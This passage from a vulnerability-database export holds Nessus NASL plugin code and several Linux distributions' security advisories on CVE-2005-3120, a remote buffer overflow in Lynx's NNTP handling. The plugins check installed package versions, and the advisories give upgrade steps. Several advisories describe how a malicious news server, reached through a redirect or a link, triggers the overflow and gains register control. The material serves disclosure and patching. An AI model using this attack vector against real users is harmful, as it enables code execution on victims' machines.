(flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:58", "bulletinFamily": "scanner", "description": "This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2005-993.NASL", "href": "https://www.tenable.com/plugins/nessus/20027", "published": "2005-10-19T00:00:00", "title": "Fedora Core 3 : lynx-2.8.5-18.0.1 (2005-993)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-993.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20027);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_xref(name:\"FEDORA\", value:\"2005-993\");\n\n script_name(english:\"Fedora Core 3 : lynx-2.8.5-18.0.1 (2005-993)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-October/001493.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28145583\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lynx and / or lynx-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"lynx-2.8.5-18.0.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"lynx-debuginfo-2.8.5-18.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx / lynx-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:44:56", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a remote vulnerability in Lynx when\nconnecting to a news server (NNTP). The function that added missing\nescape characters to article headers did not check the size of the\ntarget buffer. Specially crafted news entries could trigger a buffer\noverflow, which could be exploited to execute arbitrary code with the\nprivileges of the user running lynx. In order to exploit this, the\nuser is not even required to actively visit a news site with Lynx\nsince a malicious HTML page could automatically redirect to an nntp://\nURL with malicious news items.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-206-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20622", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : lynx vulnerability (USN-206-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-206-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20622);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:33:00\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"USN\", value:\"206-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : lynx vulnerability (USN-206-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a remote vulnerability in Lynx when\nconnecting to a news server (NNTP). The function that added missing\nescape chararacters to article headers did not check the size of the\ntarget buffer. Specially crafted news entries could trigger a buffer\noverflow, which could be exploited to execute arbitrary code with the\nprivileges of the user running lynx. 
In order to exploit this, the\nuser is not even required to actively visit a news site with Lynx\nsince a malicious HTML page could automatically redirect to an nntp://\nURL with malicious news items.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"lynx\", pkgver:\"2.8.5-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"lynx\", pkgver:\"2.8.5-2ubuntu0.5.04\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"lynx\", pkgver:\"2.8.5-2ubuntu0.5.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:50:59", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities :\n\n - CVE-2004-1617\n Michal Zalewski discovered that lynx is not able to grok\n invalid HTML including a TEXTAREA tag with a large COLS\n value and a large tag name in an element that is not\n terminated, and loops forever trying to render the\n broken HTML.\n\n - CVE-2005-3120\n Ulf Harnhammar discovered a buffer overflow that can be\n remotely exploited. 
During the handling of Asian\n characters when connecting to an NNTP server lynx can be\n tricked to write past the boundary of a buffer which can\n lead to the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-1085.NASL", "href": "https://www.tenable.com/plugins/nessus/22627", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1085-1 : lynx-cur - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1085. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22627);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2004-1617\", \"CVE-2005-3120\");\n script_bugtraq_id(11443);\n script_xref(name:\"DSA\", value:\"1085\");\n\n script_name(english:\"Debian DSA-1085-1 : lynx-cur - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities :\n\n - CVE-2004-1617\n Michal Zalewski discovered that lynx is not able to grok\n invalid HTML including a TEXTAREA tag with a large COLS\n value and a large tag name in an element that is not\n terminated, and loops forever trying to render the\n broken HTML.\n\n - CVE-2005-3120\n Ulf Harnhammar discovered a buffer overflow that can be\n remotely exploited. 
During the handling of Asian\n characters when connecting to an NNTP server lynx can be\n tricked to write past the boundary of a buffer which can\n lead to the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=296340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-1617\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1085\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx-cur package.\n\nFor the old stable distribution (woody) these problems have been fixed\nin version 2.8.5-2.5woody1.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx-cur\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx-cur\", reference:\"2.8.5-2.5woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"lynx-cur-wrapper\", reference:\"2.8.5-2.5woody1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx-cur\", reference:\"2.8.6-9sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx-cur-wrapper\", reference:\"2.8.6-9sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:05:28", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a remote buffer overflow in lynx versions\n2.8.2 through 2.8.5.\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. 
However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow,\nwith full control over EIP, EBX, EBP, ESI and EDI.\n\nTwo attack vectors to make a victim visit a URL to a dangerous news\nserver are: (a) *redirecting scripts*, where the victim visits some\nweb page and it redirects automatically to a malicious URL, and (b)\n*links in web pages*, where the victim visits some web page and\nselects a link on the page to a malicious URL. Attack vector (b) is\nhelped by the fact that Lynx does not automatically display where\nlinks lead to, unlike many graphical web browsers.\n\nThe updated packages have been patched to address this issue.\n\nUpdate :\n\nThe previous patchset had a bug in the patches themselves, which was\nuncovered by Klaus Singvogel of Novell/SUSE in auditing crashes on\nsome architectures.", "modified": "2019-12-02T00:00:00", "id": "MANDRAKE_MDKSA-2005-186.NASL", "href": "https://www.tenable.com/plugins/nessus/20057", "published": "2005-10-19T00:00:00", "title": "Mandrake Linux Security Advisory : lynx (MDKSA-2005:186-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:186. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20057);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:48\");\n\n script_cve_id(\"CVE-2005-2665\", \"CVE-2005-3120\");\n script_xref(name:\"MDKSA\", value:\"2005:186-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : lynx (MDKSA-2005:186-1)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a remote buffer overflow in lynx versions\n2.8.2 through 2.8.5.\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow,\nwith full control over EIP, EBX, EBP, ESI and EDI.\n\nTwo attack vectors to make a victim visit a URL to a dangerous news\nserver are: (a) *redirecting scripts*, where the victim visits some\nweb page and it redirects automatically to a malicious URL, and (b)\n*links in web pages*, where the victim visits some web page and\nselects a link on the page to a malicious URL. 
Attack vector (b) is\nhelped by the fact that Lynx does not automatically display where\nlinks lead to, unlike many graphical web browsers.\n\nThe updated packages have been patched to address this issue.\n\nUpdate :\n\nThe previous patchset had a bug in the patches themselves, which was\nuncovered by Klaus Singvogel of Novell/SUSE in auditing crashes on\nsome architectures.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 
audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"lynx-2.8.5-1.2.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"lynx-2.8.5-1.2.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", reference:\"lynx-2.8.5-4.2.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:44", "bulletinFamily": "unix", "description": "### Background\n\nLynx is a text-mode browser for the World Wide Web. It supports multiple URL types, including HTTP and NNTP URLs. \n\n### Description\n\nWhen accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters. \n\n### Impact\n\nAn attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Lynx users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/lynx-2.8.5-r1\"", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "GLSA-200510-15", "href": "https://security.gentoo.org/glsa/200510-15", "type": "gentoo", "title": "Lynx: Buffer overflow in NNTP processing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:37", "bulletinFamily": "unix", "description": "New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/lynx-2.8.5rel.5-i486-1.tgz: Upgraded to lynx-2.8.5rel.5.\n Fixes an issue where the handling of Asian characters when using lynx to\n connect to an NNTP server (is this a common use?) 
could result in a buffer\n overflow causing the execution of arbitrary code.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nadccab862ff6c6f3e56dc5fe1c8e3f94 lynx-2.8.5rel.5-i386-1.tgz\n\nSlackware 9.0 package:\n35eff3269c1b3a3d77a42eb341e3b253 lynx-2.8.5rel.5-i386-1.tgz\n\nSlackware 9.1 package:\n7e1fbf1f8ea42b13c669efa82837f2a2 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.0 package:\n7d7093b6207351bc15be3effe40d1dae lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.1 package:\ne762a5e53b7907c4e7a865e24c892eb4 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.2 package:\nd8c0987fce89f89908ac0965ba6e2155 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware -current package:\ne429d9138374a65a8621d8b2580e3a33 lynx-2.8.5rel.5-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg lynx-2.8.5rel.5-i486-1.tgz", "modified": "2005-11-06T13:03:17", "published": "2005-11-06T13:03:17", "id": "SSA-2005-310-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056", "title": "lynx", "type": "slackware", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-10-24T22:37:52", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 876-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 27th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx-ssl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx-ssl package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2.dsc\n Size/MD5 checksum: 609 6256bc48e63d9120301c6bdae3316675\n 
http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2.diff.gz\n Size/MD5 checksum: 87627 69a835be9e783a6788fd3122ec4c51d4\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b.orig.tar.gz\n Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_alpha.deb\n Size/MD5 checksum: 1617392 d07cb6f46da183ab5c66860d90dd48c5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_arm.deb\n Size/MD5 checksum: 1491792 b20c7575d54e86838ddeff94622ce5ff\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_i386.deb\n Size/MD5 checksum: 1447102 0707d60cdc076a9078ecd198d9e185c5\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_ia64.deb\n Size/MD5 checksum: 1769060 9f621d66228be950732846918afb9b22\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_hppa.deb\n Size/MD5 checksum: 1559592 c2c35718ba34d173fadefd3ba428695b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_m68k.deb\n Size/MD5 checksum: 1410534 86eff29224e043788f98a02f4af20402\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_mips.deb\n Size/MD5 checksum: 1511892 7fa8c96a81238e524e870dee74d07fa4\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_mipsel.deb\n Size/MD5 checksum: 1507808 5c7db52ed5910884679ec9ecc8606593\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_powerpc.deb\n Size/MD5 checksum: 1497302 f82ae7bc6ee25639bd8c18ab6c644fb5\n\n IBM S/390 architecture:\n\n 
